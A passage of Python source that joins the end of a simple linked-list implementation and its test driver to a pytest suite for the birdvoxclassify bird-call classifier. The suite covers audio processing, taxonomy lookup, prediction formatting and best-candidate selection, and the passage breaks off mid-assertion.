if not found:
raise ValueError('Item not found: {}'.format(item))
def replace(self, comparator, replacement):
# O(n) time complexity
# Walk through list until we find the target, then replace the data
found = False
node = self.head
while not found and node is not None:
if comparator(node.data) is True:
node.data = replacement
found = True
node = node.next
if not found:
raise ValueError('Replacement target not found.')
def test_linked_list():
ll = LinkedList()
print('list: {}'.format(ll))
print('\nTesting append:')
for item in ['A', 'B', 'C']:
print('append({!r})'.format(item))
ll.append(item)
print('list: {}'.format(ll))
print('head: {}'.format(ll.head))
print('tail: {}'.format(ll.tail))
print('length: {}'.format(ll.length()))
# Enable this after implementing delete method
delete_implemented = True
if delete_implemented:
print('\nTesting delete:')
for item in ['B', 'C', 'A']:
print('delete({!r})'.format(item))
ll.delete(item)
print('list: {}'.format(ll))
print('head: {}'.format(ll.head))
print('tail: {}'.format(ll.tail))
print('length: {}'.format(ll.length()))
if __name__ == '__main__':
test_linked_list()
|
import hashlib
import json
import logging
import os
import pathlib
import shutil
import sys
import tempfile
import pytest
import numpy as np
import soundfile as sf
from scipy.signal.windows import get_window
from numbers import Real
from birdvoxclassify import *
from birdvoxclassify.core import apply_hierarchical_consistency, \
_validate_prediction, _validate_batch_pred_list, _validate_taxonomy
from birdvoxclassify.birdvoxclassify_exceptions import BirdVoxClassifyError
PROJECT_DIR = os.path.join(os.path.dirname(__file__), "..")
MODULE_DIR = os.path.join(PROJECT_DIR, "birdvoxclassify")
TEST_AUDIO_DIR = os.path.join(os.path.dirname(__file__), 'data/audio')
CHIRP_PATH = os.path.join(TEST_AUDIO_DIR, 'synth_chirp.wav')
RES_DIR = os.path.join(MODULE_DIR, "resources")
TAX_DIR = os.path.join(RES_DIR, "taxonomy")
MODELS_DIR = os.path.join(RES_DIR, "models")
TAXV1_HIERARCHICAL_PATH = os.path.join(TAX_DIR, "tv1hierarchical.json")
TAXV1_FINE_PATH = os.path.join(TAX_DIR, "tv1fine.json")
MODEL_SUFFIX = "flat-multitask-convnet-v2_" \
"tv1hierarchical-3c6d869456b2705ea5805b6b7d08f870"
MODEL_NAME = "birdvoxclassify-{}".format(MODEL_SUFFIX)
def test_process_file():
test_output_dir = tempfile.mkdtemp()
test_audio_dir = tempfile.mkdtemp()
classifier = load_classifier(MODEL_NAME)
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
test_output_summary_path = os.path.join(test_output_dir, "summary.json")
test_output_path = get_output_path(CHIRP_PATH, '.json',
test_output_dir)
suffix_test_output_path = get_output_path(CHIRP_PATH,
'suffix.json',
test_output_dir)
try:
# Test with defaults
output = process_file(CHIRP_PATH, model_name=MODEL_NAME)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# Test with selecting best candidates
output = process_file(CHIRP_PATH, model_name=MODEL_NAME,
select_best_candidates=True)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# There should only be one candidate per level
for level, cand_dict in v.items():
assert isinstance(level, str)
assert isinstance(cand_dict, dict)
# Test with list
output = process_file([CHIRP_PATH], model_name=MODEL_NAME)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# Test with given classifier and taxonomy
output = process_file([CHIRP_PATH], classifier=classifier,
taxonomy=taxonomy)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# Test output_dir
output = process_file([CHIRP_PATH], output_dir=test_output_dir,
classifier=classifier)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
with open(test_output_path, 'r') as f:
f_output = json.load(f)
assert next(iter(output.values())) == f_output
# Test output dir with suffix
output = process_file([CHIRP_PATH], output_dir=test_output_dir,
classifier=classifier, suffix='suffix')
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
with open(suffix_test_output_path, 'r') as f:
f_output = json.load(f)
assert next(iter(output.values())) == f_output
# Test output summary file
output = process_file([CHIRP_PATH],
output_summary_path=test_output_summary_path,
classifier=classifier)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
with open(test_output_summary_path, 'r') as f:
f_output = json.load(f)
assert output == f_output
test_a_path = os.path.join(test_audio_dir, "a.wav")
test_b_path = os.path.join(test_audio_dir, "b.wav")
test_c_path = os.path.join(test_audio_dir, "c.wav")
test_d_path = os.path.join(test_audio_dir, "d.wav")
shutil.copy(CHIRP_PATH, test_a_path)
shutil.copy(CHIRP_PATH, test_b_path)
shutil.copy(CHIRP_PATH, test_c_path)
shutil.copy(CHIRP_PATH, test_d_path)
test_audio_list = [test_a_path, test_b_path, test_c_path, test_d_path]
# Test multiple files
output = process_file(test_audio_list, classifier=classifier)
assert type(output) == dict
assert len(output) == len(test_audio_list)
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# Test with different batch_sizes
output = process_file(test_audio_list, classifier=classifier, batch_size=2)
assert type(output) == dict
assert len(output) == len(test_audio_list)
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# Make sure we create the output dir if it doesn't exist
shutil.rmtree(test_output_dir)
output = process_file([CHIRP_PATH], output_dir=test_output_dir,
classifier=classifier)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
with open(test_output_path, 'r') as f:
f_output = json.load(f)
assert next(iter(output.values())) == f_output
finally:
shutil.rmtree(test_output_dir)
shutil.rmtree(test_audio_dir)
def test_format_pred():
taxonomy = load_taxonomy(TAXV1_FINE_PATH)
pred = np.random.random((15,))
pred /= pred.sum()
pred_list = [pred]
output_ids = [
"1.1.1",
"1.1.2",
"1.1.3",
"1.1.4",
"1.2.1",
"1.3.1",
"1.3.2",
"1.4.1",
"1.4.2",
"1.4.3",
"1.4.4",
"1.4.5",
"1.4.6",
"1.4.7",
"other"
]
exp_output = {'fine': {}}
for idx, ref_id in enumerate(output_ids):
if ref_id == "other":
node = {
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][idx]["ids"]
}
else:
node = get_taxonomy_node(ref_id, taxonomy)
exp_output['fine'][ref_id] = {'probability': pred[idx]}
exp_output['fine'][ref_id].update(node)
output = format_pred(pred_list, taxonomy)
for ref_id in output_ids:
assert output['fine'][ref_id]["common_name"] \
== exp_output['fine'][ref_id]["common_name"]
assert output['fine'][ref_id]["scientific_name"] \
== exp_output['fine'][ref_id]["scientific_name"]
assert output['fine'][ref_id]["taxonomy_level_names"] \
== exp_output['fine'][ref_id]["taxonomy_level_names"]
assert output['fine'][ref_id]["taxonomy_level_aliases"] \
== exp_output['fine'][ref_id]["taxonomy_level_aliases"]
assert output['fine'][ref_id]["child_ids"] \
== exp_output['fine'][ref_id]["child_ids"]
assert np.isclose(output['fine'][ref_id]["probability"],
exp_output['fine'][ref_id]["probability"])
if ref_id != "other":
assert output['fine'][ref_id]["id"] \
== exp_output['fine'][ref_id]["id"] \
== ref_id
# Test when we have a batch dimension of 1
pred_list = [pred[np.newaxis, :]]
output = format_pred(pred_list, taxonomy)
for ref_id in output_ids:
assert output['fine'][ref_id]["common_name"] \
== exp_output['fine'][ref_id]["common_name"]
assert output['fine'][ref_id]["scientific_name"] \
== exp_output['fine'][ref_id]["scientific_name"]
assert output['fine'][ref_id]["taxonomy_level_names"] \
== exp_output['fine'][ref_id]["taxonomy_level_names"]
assert output['fine'][ref_id]["taxonomy_level_aliases"] \
== exp_output['fine'][ref_id]["taxonomy_level_aliases"]
assert output['fine'][ref_id]["child_ids"] \
== exp_output['fine'][ref_id]["child_ids"]
assert np.isclose(output['fine'][ref_id]["probability"],
exp_output['fine'][ref_id]["probability"])
if ref_id != "other":
assert output['fine'][ref_id]["id"] \
== exp_output['fine'][ref_id]["id"] \
== ref_id
# Make sure we fail when batch dimension is greater than 1
pred_list = [np.tile(pred, (2, 1))]
pytest.raises(BirdVoxClassifyError, format_pred, pred_list, taxonomy)
# Make sure we fail with wrong taxonomy
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
pred_list = [pred]
pytest.raises(BirdVoxClassifyError, format_pred, pred_list, taxonomy)
# Test the hierarchical case
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
fine_pred = np.random.random((15,))
medium_pred = np.random.random((5,))
coarse_pred = np.random.random((1,))
pred_list = [coarse_pred, medium_pred, fine_pred]
output = format_pred(pred_list, taxonomy)
exp_output = {}
for level_idx, (level, encoding_list) \
in enumerate(taxonomy['output_encoding'].items()):
exp_output[level] = {}
for idx, encoding_item in enumerate(encoding_list):
if len(encoding_item["ids"]) > 1:
ref_id = "other"
node = {
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": level,
"taxonomy_level_aliases": {},
'child_ids': encoding_item["ids"]
}
else:
ref_id = encoding_item["ids"][0]
node = get_taxonomy_node(ref_id, taxonomy)
if level == 'coarse' and idx == 1:
exp_output[level][ref_id] = {
'probability': 1 - pred_list[level_idx][0]}
else:
exp_output[level][ref_id] = {'probability': pred_list[level_idx][idx]}
exp_output[level][ref_id].update(node)
for level, encoding_list in taxonomy["output_encoding"].items():
for encoding_item in encoding_list:
if len(encoding_item["ids"]) > 1:
ref_id = "other"
else:
ref_id = encoding_item["ids"][0]
assert output[level][ref_id]["common_name"] \
== exp_output[level][ref_id]["common_name"]
assert output[level][ref_id]["scientific_name"] \
== exp_output[level][ref_id]["scientific_name"]
assert output[level][ref_id]["taxonomy_level_names"] \
== exp_output[level][ref_id]["taxonomy_level_names"]
assert output[level][ref_id]["taxonomy_level_aliases"] \
== exp_output[level][ref_id]["taxonomy_level_aliases"]
assert output[level][ref_id]["child_ids"] \
== exp_output[level][ref_id]["child_ids"]
assert np.isclose(output[level][ref_id]["probability"],
exp_output[level][ref_id]["probability"])
if ref_id != "other":
assert output[level][ref_id]["id"] \
== exp_output[level][ref_id]["id"] \
== ref_id
# Make sure real prediction makes it through the pipeline
audio, sr = sf.read(CHIRP_PATH, dtype='float64')
classifier = load_classifier(MODEL_NAME)
pcen = compute_pcen(audio, sr)
pred = predict(pcen, classifier, logging.INFO)
output = format_pred(pred, taxonomy)
def test_format_pred_batch():
taxonomy = load_taxonomy(TAXV1_FINE_PATH)
pred = np.random.random((15,))
pred /= pred.sum()
output_ids = [
"1.1.1",
"1.1.2",
"1.1.3",
"1.1.4",
"1.2.1",
"1.3.1",
"1.3.2",
"1.4.1",
"1.4.2",
"1.4.3",
"1.4.4",
"1.4.5",
"1.4.6",
"1.4.7",
"other"
]
exp_output = {'fine': {}}
for idx, ref_id in enumerate(output_ids):
if ref_id == "other":
node = {
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][idx]["ids"]
}
else:
node = get_taxonomy_node(ref_id, taxonomy)
exp_output['fine'][ref_id] = {'probability': pred[idx]}
exp_output['fine'][ref_id].update(node)
batch_pred_list = [np.tile(pred, (10, 1))]
exp_output_batch = [exp_output] * 10
output_batch = format_pred_batch(batch_pred_list=batch_pred_list,
taxonomy=taxonomy)
for idx, output in enumerate(output_batch):
for ref_id in output_ids:
exp_output = exp_output_batch[idx]
assert output['fine'][ref_id]["common_name"] \
== exp_output['fine'][ref_id]["common_name"]
assert output['fine'][ref_id]["scientific_name"] \
== exp_output['fine'][ref_id]["scientific_name"]
assert output['fine'][ref_id]["taxonomy_level_names"] \
== exp_output['fine'][ref_id]["taxonomy_level_names"]
assert output['fine'][ref_id]["taxonomy_level_aliases"] \
== exp_output['fine'][ref_id]["taxonomy_level_aliases"]
assert output['fine'][ref_id]["child_ids"] \
== exp_output['fine'][ref_id]["child_ids"]
assert np.isclose(output['fine'][ref_id]["probability"],
exp_output['fine'][ref_id]["probability"])
if ref_id != "other":
assert output['fine'][ref_id]["id"] \
== exp_output['fine'][ref_id]["id"] \
== ref_id
pytest.raises(BirdVoxClassifyError, format_pred_batch,
[np.tile(pred, (10, 1)), np.tile(pred, (5, 1))], taxonomy)
def test_get_taxonomy_node():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
ref_id = "1"
node = get_taxonomy_node(ref_id, taxonomy)
assert "id" in node
assert "common_name" in node
assert "scientific_name" in node
assert "taxonomy_level_names" in node
assert "taxonomy_level_aliases" in node
assert "child_ids" in node
assert node["id"] == ref_id
assert isinstance(node["common_name"], str)
assert isinstance(node["scientific_name"], str)
assert node["taxonomy_level_names"] == "coarse"
assert isinstance(node["taxonomy_level_aliases"], dict)
assert type(node["child_ids"]) == list
assert len(node["child_ids"]) >= 1
ref_id = "1.1"
node = get_taxonomy_node(ref_id, taxonomy)
assert "id" in node
assert "common_name" in node
assert "scientific_name" in node
assert "taxonomy_level_names" in node
assert "taxonomy_level_aliases" in node
assert "child_ids" in node
assert node["id"] == ref_id
assert isinstance(node["common_name"], str)
assert isinstance(node["scientific_name"], str)
assert node["taxonomy_level_names"] == "medium"
assert isinstance(node["taxonomy_level_aliases"], dict)
assert type(node["child_ids"]) == list
assert len(node["child_ids"]) >= 1
ref_id = "1.1.1"
node = get_taxonomy_node(ref_id, taxonomy)
assert "id" in node
assert "common_name" in node
assert "scientific_name" in node
assert "taxonomy_level_names" in node
assert "taxonomy_level_aliases" in node
assert "child_ids" in node
assert node["id"] == ref_id
assert isinstance(node["common_name"], str)
assert isinstance(node["scientific_name"], str)
assert node["taxonomy_level_names"] == "fine"
assert isinstance(node["taxonomy_level_aliases"], dict)
assert type(node["child_ids"]) == list
assert len(node["child_ids"]) == 0
ref_id = "other"
node = get_taxonomy_node(ref_id, taxonomy)
assert node == {"id": "other"}
# Check for invalid inputs
pytest.raises(BirdVoxClassifyError, get_taxonomy_node, "0", taxonomy)
pytest.raises(TypeError, get_taxonomy_node, "1", [])
pytest.raises(BirdVoxClassifyError, get_taxonomy_node, "1",
{'taxonomy': []})
pytest.raises(BirdVoxClassifyError, get_taxonomy_node, "1",
{'taxonomy': [{}]})
def test_batch_generator():
pcen_settings = get_pcen_settings()
# Test invalid inputs
with pytest.raises(BirdVoxClassifyError) as e:
gen = batch_generator(['/invalid/path.wav'], batch_size=512)
next(gen)
with pytest.raises(BirdVoxClassifyError) as e:
gen = batch_generator(['/invalid/path.wav'], batch_size=-1)
next(gen)
with pytest.raises(BirdVoxClassifyError) as e:
gen = batch_generator(['/invalid/path.wav'], batch_size=512.0)
next(gen)
with pytest.raises(BirdVoxClassifyError) as e:
gen = batch_generator([], batch_size=512)
next(gen)
# Test empty file
empty_path = 'empty.wav'
pathlib.Path(empty_path).touch()
try:
with pytest.raises(BirdVoxClassifyError) as e:
gen = batch_generator([empty_path], batch_size=512)
next(gen)
finally:
os.remove(empty_path)
gen = batch_generator([CHIRP_PATH]*10, batch_size=10)
batch, batch_filepaths = next(gen)
assert type(batch) == np.ndarray
assert batch.shape == (10, pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
assert len(batch_filepaths) == 10
gen = batch_generator([CHIRP_PATH], batch_size=10)
batch, batch_filepaths = next(gen)
assert type(batch) == np.ndarray
assert batch.shape == (1, pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
assert len(batch_filepaths) == 1
def test_compute_pcen():
pcen_settings = get_pcen_settings()
audio, sr = sf.read(CHIRP_PATH, dtype='float64')
pcenf64 = compute_pcen(audio, sr)
assert pcenf64.dtype == np.float32
assert pcenf64.shape == (pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
pcenf64_r = compute_pcen(audio, sr, input_format=False)
assert pcenf64_r.dtype == np.float32
assert pcenf64_r.ndim == 2
assert pcenf64_r.shape[0] == pcen_settings['top_freq_id']
audio, sr = sf.read(CHIRP_PATH, dtype='float32')
pcenf32 = compute_pcen(audio, sr)
assert pcenf32.dtype == np.float32
assert pcenf32.shape == (pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
pcenf32_r = compute_pcen(audio, sr, input_format=False)
assert pcenf32_r.dtype == np.float32
assert pcenf32_r.ndim == 2
assert pcenf32_r.shape[0] == pcen_settings['top_freq_id']
audio, sr = sf.read(CHIRP_PATH, dtype='int16')
pceni16 = compute_pcen(audio, sr)
assert pceni16.dtype == np.float32
assert pceni16.shape == (pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
pceni16_r = compute_pcen(audio, sr, input_format=False)
assert pceni16_r.dtype == np.float32
assert pceni16_r.ndim == 2
assert pceni16_r.shape[0] == pcen_settings['top_freq_id']
audio, sr = sf.read(CHIRP_PATH, dtype='int32')
pceni32 = compute_pcen(audio, sr)
assert pceni32.dtype == np.float32
assert pceni32.shape == (pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
pceni32_r = compute_pcen(audio, sr, input_format=False)
assert pceni32_r.dtype == np.float32
assert pceni32_r.ndim == 2
assert pceni32_r.shape[0] == pcen_settings['top_freq_id']
# Make sure PCEN values are similar for different input representations
assert np.allclose(pcenf64, pcenf32, rtol=1e-5, atol=1e-5)
assert np.allclose(pcenf64, pceni16, rtol=1e-5, atol=1e-5)
assert np.allclose(pcenf64, pceni32, rtol=1e-5, atol=1e-5)
# Make sure that padding is handled with short audio
short_audio = np.random.random((10,))
short_pcen = compute_pcen(short_audio, sr)
assert short_pcen.dtype == np.float32
assert short_pcen.shape == (pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
# Make sure unsigned ints raise an error
pytest.raises(BirdVoxClassifyError, compute_pcen,
audio.astype('uint32'), sr)
def test_predict():
classifier = load_classifier(MODEL_NAME)
audio, sr = sf.read(CHIRP_PATH, dtype='float64')
pcen = compute_pcen(audio, sr)
pred = predict(pcen, classifier, logging.INFO)
assert type(pred) == list
assert pred[0].shape == (1, 1)
assert pred[1].shape == (1, 5)
assert pred[2].shape == (1, 15)
gen = batch_generator([CHIRP_PATH]*10, batch_size=10)
batch, batch_filepaths = next(gen)
pred = predict(batch, classifier, logging.INFO)
assert type(pred) == list
assert pred[0].shape == (10, 1)
assert pred[1].shape == (10, 5)
assert pred[2].shape == (10, 15)
# Test invalid inputs
inv_pcen = compute_pcen(audio, sr, input_format=False)[..., np.newaxis]
pytest.raises(BirdVoxClassifyError, predict, inv_pcen, classifier, logging.INFO)
pytest.raises(BirdVoxClassifyError, predict, np.array([1, 2, 3, 4]), classifier,
logging.INFO)
pytest.raises(BirdVoxClassifyError, predict, np.zeros((1, 42, 104, 1)),
classifier, logging.INFO)
pytest.raises(BirdVoxClassifyError, predict, np.zeros((1, 120, 42, 1)),
classifier, logging.INFO)
pytest.raises(BirdVoxClassifyError, predict, np.zeros((1, 120, 104, 42)),
classifier, logging.INFO)
def test_get_output_path():
filepath = '/path/to/file/test.wav'
output_dir = '/output/dir'
exp_output_path = '/path/to/file/test.npz'
output_path = get_output_path(filepath, ".npz", None)
assert output_path == exp_output_path
exp_output_path = '/path/to/file/test_suffix.npz'
output_path = get_output_path(filepath, "suffix.npz", None)
assert output_path == exp_output_path
exp_output_path = '/output/dir/test.npz'
output_path = get_output_path(filepath, ".npz", output_dir)
assert output_path == exp_output_path
exp_output_path = '/output/dir/test_suffix.npz'
output_path = get_output_path(filepath, "suffix.npz", output_dir)
assert output_path == exp_output_path
def test_get_pcen_settings():
settings = get_pcen_settings()
assert type(settings) == dict
assert 'sr' in settings
assert isinstance(settings['sr'], Real)
assert settings['sr'] > 0
assert 'fmin' in settings
assert isinstance(settings['fmin'], Real)
assert settings['fmin'] > 0
assert 'fmax' in settings
assert isinstance(settings['fmax'], Real)
assert settings['fmax'] > settings['fmin']
assert settings['sr'] / 2.0 >= settings['fmax']
assert 'hop_length' in settings
assert isinstance(settings['hop_length'], int)
assert settings['hop_length'] > 0
assert 'n_fft' in settings
assert isinstance(settings['n_fft'], int)
assert settings['n_fft'] > 0
assert 'n_mels' in settings
assert isinstance(settings['n_mels'], int)
assert settings['n_fft'] > settings['n_mels'] > 0
assert 'pcen_delta' in settings
assert isinstance(settings['pcen_delta'], float)
assert settings['pcen_delta'] > 0
assert 'pcen_time_constant' in settings
assert isinstance(settings['pcen_time_constant'], float)
assert settings['pcen_time_constant'] > 0
assert 'pcen_norm_exponent' in settings
assert isinstance(settings['pcen_norm_exponent'], float)
assert settings['pcen_norm_exponent'] > 0
assert 'pcen_power' in settings
assert isinstance(settings['pcen_power'], float)
assert settings['pcen_power'] > 0
assert 'top_freq_id' in settings
assert isinstance(settings['top_freq_id'], int)
assert settings['top_freq_id'] > 0
assert 'win_length' in settings
assert isinstance(settings['win_length'], int)
assert settings['win_length'] > 0
assert 'n_hops' in settings
assert isinstance(settings['n_hops'], int)
assert settings['n_hops'] > 0
assert 'window' in settings
assert isinstance(settings['window'], str)
# Make sure window is valid
get_window(settings['window'], 5)
def test_get_model_path():
test_model_name = "test_model_name"
exp_model_path = os.path.join(RES_DIR, "models", test_model_name + '.h5')
model_path = get_model_path(test_model_name)
assert os.path.abspath(model_path) == os.path.abspath(exp_model_path)
# Test Python 3.8 handling
test_model_name = "birdvoxclassify_test_model_name"
if sys.version_info.major == 3 and sys.version_info.minor == 8:
exp_test_model_name = "birdvoxclassify-py3pt8_test_model_name"
else:
exp_test_model_name = "birdvoxclassify_test_model_name"
exp_model_path = os.path.join(RES_DIR, "models", exp_test_model_name + '.h5')
model_path = get_model_path(test_model_name)
assert os.path.abspath(model_path) == os.path.abspath(exp_model_path)
# Test deprecated taxonomy checksums
test_model_name = "test_model_name-2e7e1bbd434a35b3961e315cfe3832fc"
pytest.deprecated_call(get_model_path, test_model_name)
test_model_name = "test_model_name-beb9234f0e13a34c7ac41db72e85addd"
pytest.deprecated_call(get_model_path, test_model_name)
def test_load_classifier():
classifier = load_classifier(MODEL_NAME)
# Test invalid inputs
invalid_path = get_model_path("invalid-classifier")
with open(invalid_path, "w") as f:
f.write("INVALID")
try:
pytest.raises(BirdVoxClassifyError, load_classifier, "invalid-classifier")
finally:
os.remove(invalid_path)
pytest.raises(BirdVoxClassifyError, load_classifier, "/invalid/path")
def test_get_taxonomy_path():
# Make sure that the correct taxonomy path is returned
taxonomy_version = "v1234"
test_content = 'hello world!'
hash_md5 = hashlib.md5()
hash_md5.update(test_content.encode())
exp_md5sum = hash_md5.hexdigest()
exp_taxonomy_path = os.path.join(TAX_DIR, taxonomy_version + ".json")
with open(exp_taxonomy_path, 'w') as f:
f.write(test_content)
model_name = "test-model-name_{}-{}".format(taxonomy_version, exp_md5sum)
try:
taxonomy_path = get_taxonomy_path(model_name)
assert os.path.abspath(taxonomy_path) == os.path.abspath(exp_taxonomy_path)
# Make sure that an error is raised when md5sum doesn't match
hash_md5 = hashlib.md5()
hash_md5.update("different".encode())
diff_md5sum = hash_md5.hexdigest()
model_name = "test-model-name_{}-{}".format(taxonomy_version, diff_md5sum)
pytest.raises(BirdVoxClassifyError, get_taxonomy_path,
model_name)
finally:
os.remove(exp_taxonomy_path)
# Test deprecated taxonomy checksums
test_model_name = "test-model-name_tv1hierarchical-2e7e1bbd434a35b3961e315cfe3832fc"
pytest.deprecated_call(get_taxonomy_path, test_model_name)
test_model_name = "test-model-name_tv1fine-beb9234f0e13a34c7ac41db72e85addd"
pytest.deprecated_call(get_taxonomy_path, test_model_name)
def test_validate_batch_pred_list():
n_examples = 5
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
# Test valid batch
batch_pred_list = []
for level, encoding_list in taxonomy["output_encoding"].items():
n_classes = len(encoding_list)
batch_pred = np.random.random((n_examples, n_classes))
batch_pred_list.append(batch_pred)
_validate_batch_pred_list(batch_pred_list)
# Test invalid batch
batch_pred_list = []
for idx, (level, encoding_list) in enumerate(taxonomy["output_encoding"].items()):
n_classes = len(encoding_list)
if idx == 0:
batch_pred = np.random.random((10, n_classes))
else:
batch_pred = np.random.random((n_examples, n_classes))
batch_pred_list.append(batch_pred)
pytest.raises(BirdVoxClassifyError, _validate_batch_pred_list, batch_pred_list)
def test_validate_prediction():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
# Test valid prediction
pred_list = []
for level, encoding_list in taxonomy["output_encoding"].items():
n_classes = len(encoding_list)
pred = np.random.random((n_classes,))
pred_list.append(pred)
formatted_pred_dict = format_pred(pred_list, taxonomy)
_validate_prediction(pred_list, taxonomy)
_validate_prediction([pred[np.newaxis, :] for pred in pred_list], taxonomy)
_validate_prediction(formatted_pred_dict, taxonomy)
# Test invalid batches
pytest.raises(BirdVoxClassifyError, _validate_prediction,
pred_list * 2, taxonomy)
pred_list = []
for level, encoding_list in taxonomy["output_encoding"].items():
n_classes = len(encoding_list)
# Ensure number of classes is different than expected
pred = np.random.random((n_classes + 5,))
pred_list.append(pred)
pytest.raises(BirdVoxClassifyError, _validate_prediction,
pred_list, taxonomy)
# Make sure a real prediction makes it through the pipeline with no problem
output = process_file(CHIRP_PATH, model_name=MODEL_NAME)
formatted_pred_dict = [x for x in output.values()][0]
_validate_prediction(formatted_pred_dict, taxonomy)
def test_get_batch_best_candidates():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
# Non-HC and HC Cand: "1"
coarse_pred = np.array([0.9])
# Non-HC and HC Cand: "1.4"
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# Non-HC Cand: "1.1.1", HC Cand: "1.4.3"
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {'probability': medium_pred[3]}
exp_output['medium'].update(get_taxonomy_node("1.4", taxonomy))
exp_output['fine'] = {'probability': fine_pred[0]}
exp_output['fine'].update(get_taxonomy_node("1.1.1", taxonomy))
batch_pred_list = [np.tile(pred, (10, 1)) for pred in pred_list]
batch_formatted_pred_list = [formatted_pred_dict] * 10
exp_output_batch = [exp_output] * 10
batch_best_cand_list = get_batch_best_candidates(
batch_formatted_pred_list=batch_formatted_pred_list,
hierarchical_consistency=False)
batch_best_cand_list_2 = get_batch_best_candidates(
batch_pred_list=batch_pred_list,
hierarchical_consistency=False,
taxonomy=taxonomy
)
# Make sure output is as expected
for idx, best_cand_dict in enumerate(batch_best_cand_list):
exp_output = exp_output_batch[idx]
assert set(exp_output.keys()) == set(best_cand_dict.keys())
for level in exp_output.keys():
assert best_cand_dict[level]["common_name"] \
== exp_output[level]["common_name"]
assert best_cand_dict[level]["scientific_name"] \
== exp_output[level]["scientific_name"]
assert best_cand_dict[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert best_cand_dict[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert best_cand_dict[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(best_cand_dict[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert best_cand_dict[level]["id"] == exp_output[level]["id"]
# Make sure unformatted and formatted batches both produce the same result
assert len(batch_best_cand_list) == len(batch_best_cand_list_2)
for idx, best_cand_dict in enumerate(batch_best_cand_list):
best_cand_dict_2 = batch_best_cand_list_2[idx]
assert set(best_cand_dict_2.keys()) == set(best_cand_dict.keys())
for level in best_cand_dict_2.keys():
assert best_cand_dict[level]["common_name"] \
== best_cand_dict_2[level]["common_name"]
assert best_cand_dict[level]["scientific_name"] \
== best_cand_dict_2[level]["scientific_name"]
assert best_cand_dict[level]["taxonomy_level_names"] \
== best_cand_dict_2[level]["taxonomy_level_names"]
assert best_cand_dict[level]["taxonomy_level_aliases"] \
== best_cand_dict_2[level]["taxonomy_level_aliases"]
assert best_cand_dict[level]["child_ids"] \
== best_cand_dict_2[level]["child_ids"]
assert np.isclose(best_cand_dict[level]["probability"],
best_cand_dict_2[level]["probability"])
if 'id' in best_cand_dict[level]:
assert best_cand_dict[level]["id"] == best_cand_dict_2[level]["id"]
# Check invalid inputs
pytest.raises(BirdVoxClassifyError, get_batch_best_candidates,
batch_pred_list=batch_pred_list,
batch_formatted_pred_list=batch_formatted_pred_list)
pytest.raises(BirdVoxClassifyError, get_batch_best_candidates,
batch_formatted_pred_list=batch_formatted_pred_list)
def test_get_best_candidates():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
# Non-HC and HC Cand: "1"
coarse_pred = np.array([0.9])
# Non-HC and HC Cand: "1.4"
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# Non-HC Cand: "1.1.1", HC Cand: "1.4.3"
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out1 = get_best_candidates(formatted_pred_dict=formatted_pred_dict,
hierarchical_consistency=False)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {'probability': medium_pred[3]}
exp_output['medium'].update(get_taxonomy_node("1.4", taxonomy))
exp_output['fine'] = {'probability': fine_pred[0]}
exp_output['fine'].update(get_taxonomy_node("1.1.1", taxonomy))
# Make sure output is in expected format
assert set(out1.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out1.items():
assert isinstance(cand_dict, dict)
assert out1[level]["common_name"] == exp_output[level]["common_name"]
assert out1[level]["scientific_name"] \
